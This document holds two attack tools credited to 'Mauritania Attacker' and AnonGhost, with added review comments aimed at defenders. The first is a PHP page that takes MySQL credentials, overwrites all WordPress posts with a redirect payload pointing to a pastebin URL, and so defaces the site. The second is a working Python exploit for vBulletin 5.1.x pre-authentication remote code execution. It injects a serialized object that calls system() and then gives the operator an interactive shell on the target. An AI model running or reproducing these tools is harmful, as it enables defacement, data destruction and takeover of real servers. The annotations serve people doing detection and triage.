<?php
// Standalone database-level defacement page aimed at WordPress tables.
// It renders a form asking for MySQL host, database name, table prefix,
// user and password, then overwrites columns of <prefix>posts in every row
// with the submitted markup. It talks to MySQL directly and never calls
// WordPress code, so it needs working database credentials and network
// reach to the database server.
//
// Defender notes:
// - The pre-filled payload is a <meta http-equiv="refresh"> redirect tag;
//   affected rows carry that tag in post_title, post_name or post_content.
// - NOTE(review): presumably used after the site's database credentials
//   were read from a compromised host -- confirm during triage. Treat the
//   credentials as exposed: rotate them and restore the posts table from
//   a known-good backup.
// - Restricting the database account to the hosts that need it and keeping
//   the WordPress configuration file unreadable to other accounts limits
//   where a page like this can be used from.
echo '<form method="POST">
<p align="center">
<img border="0" src="https://i.imgur.com/a4J8oU3.jpg"></p>
<center><font color="red" size="6" face="impact">Wordpress Index Hijack Priv8</font></center>
<center><font color="red" size="2" face="orion">Coded By Mauritania Attacker</font></center>
<center><input type="text" value="localhost" name="pghost">
<input type="text" value="database_name" name="dbnmn">
<input type="text" value="prefix" name="prefix">
<input type="text" value="username_db" name="dbusrrrr">
<input type="text" value="password_db" name="pwddbbn"></center><br>
<center><textarea name="pown" cols="85" rows="10"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw.php?i=WG1zASMG"></textarea><br>
<input type="submit" name="up2" value="Hijack Index"><br></center><form>';
// Every field is read straight from $_POST with no isset() check and no
// escaping; only the payload passes through stripslashes().
$pghost = $_POST['pghost'];
$dbnmn = $_POST['dbnmn'];
$dbusrrrr = $_POST['dbusrrrr'];
$pwddbbn = $_POST['pwddbbn'];
$index = stripslashes($_POST['pown']);
$prefix = $_POST['prefix'];
// Disabled hard-coded default prefix; the form value above is used instead.
//$prefix = "wp_";
// The database work runs only when the submit button value is present.
if ($_POST['up2']) {
// Legacy mysql_* API (removed in PHP 7.0), so the page runs as-is only
// where that extension is still available. '@' hides warnings and die()
// prints the driver error text to the page.
@mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
@mysql_select_db($dbnmn) or die(mysql_error());
$tableName = $prefix . "posts";
// "WHERE ID > 0" has no further filter, and prefix and payload are
// concatenated into the statement unescaped. In database logs this shows
// up as an UPDATE on the posts table with that WHERE clause.
$ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
// Damage assessment: post_content is attempted only when the post_title
// update failed. The elseif is reached only when $ghost1 is truthy, where
// $ghost2 is still unset, so post_name is overwritten as well whenever the
// title update succeeded.
if (!$ghost1) {
$ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
} elseif (!$ghost2) {
$ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
}
mysql_close();
// $ghost2 / $ghost3 may be undefined here, depending on the branch taken above.
if ($ghost1 || $ghost2 || $ghost3) {
echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
} else {
echo "<center><p><b><font color='red'>Failed To Hijack the Website

</font></p></b></center>";
}
}
?>
#Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
#Date: 11-10-2015
#Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
#Requirements: Python 3.4.x or higher, install Requests and parse Module.
#Description: Not the authors of this exploit we just fixed the exploit and coded this script (Mauritania Attacker & Th3Falcon)
import requests, re, sys
import parse as urlparse #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
# Prints the tool's start-up banner to stdout; no network activity happens here.
def banner():
print( '\n' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( ' VBulletin 5.1.x RCE auto Exploiter Priv8 ' )
print( ' GreetZ To All AnonGhost Members ' )
print( ' Coded by Mauritania Attacker & Th3Falcon ' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( '\n' )
# Probe step. Sends a GET to <ghost>/ajax/api/hook/decodeArguments with an
# `arguments` parameter holding a PHP-serialized vB_dB_Result object whose
# nested vB_Database entry maps 'free_result' to 'system'.
# NOTE(review): the server-side code is not on this page; from the payload
# shape this is PHP object injection through unserialize() on request data.
# Returns the remote working directory string on success, '' otherwise.
#
# Defender notes:
# - Log / WAF indicator: requests to /ajax/api/hook/decodeArguments whose
#   query string carries serialized-object markers such as
#   O:12:"vB_dB_Result" or "vB_Database".
# - The header of this listing describes the issue as pre-auth on
#   vBulletin 5.1.x, so absence of a login in the logs does not rule it out.
#   Move to a vendor-fixed release; until then, block this path at the edge.
def inject( ghost ):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
try:
# First request only echoes a fixed marker string.
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
# A response shorter than 50 characters that contains the marker is taken
# as confirmation that the command ran.
if 'Th3Falcon' in r.text and len( r.text ) < 50:
try:
# Second request collects whoami, id, uname -a and pwd output, with ':::'
# as the separator the response is split on below.
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
print( ' [+] GROUP : ' + r.text.split( ':::' )[0].strip() )
print( ' [+] USER : ' + r.text.split( ':::' )[1].strip() )
print( ' [+] KERNEL : ' + r.text.split( ':::' )[2].strip() )
print( ' [+] DIR : ' + r.text.split( ':::' )[3].strip() )
sys.stdout.flush()
return r.text.split( ':::' )[3].strip();
# Bare except: any network or parsing error here is reported as ''.
except:
return ''
else:
return ''
except:
print(' [+] Problem while exploiting..')
return ''
# Sends one operator-supplied command string inside the same serialized
# object used by inject() and prints the raw response body. The s:<n>
# length prefix is built from len(command).
# Defender note: each command is its own GET to
# /ajax/api/hook/decodeArguments, so where query strings are logged the
# access log holds the command text of every step -- useful for
# reconstructing what was run on the host.
def bash(ghost, command):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
print(r.text)
# Interactive driver: prints the banner, then repeatedly asks for a base URL
# and runs inject() against it. When inject() returns a non-empty string, it
# opens a prompt that forwards each entered line to bash() until 'exit'.
def main():
banner()
site = ''
while site != 'exit':
site = input('Target : ')
if site == 'exit':
break
# inject() returns '' for every failure path, so '' means "no session".
mad = inject(site)
if mad != '' :
print(' [+] @Connection Successfully established... \n')
userinput = ''
while userinput != 'exit':
userinput = input("AnonGhost@Target :")
if userinput == 'exit':
break
bash(site, userinput)
else:
print(' [+] Website is not Vulnerable

')
# Script entry point: runs the interactive loop only when executed directly.
if __name__ == '__main__':
main()
#D0ne
#./Mauritania Attacker
#./Th3Falcon
#GreetZ To All AnonGhost MemberZ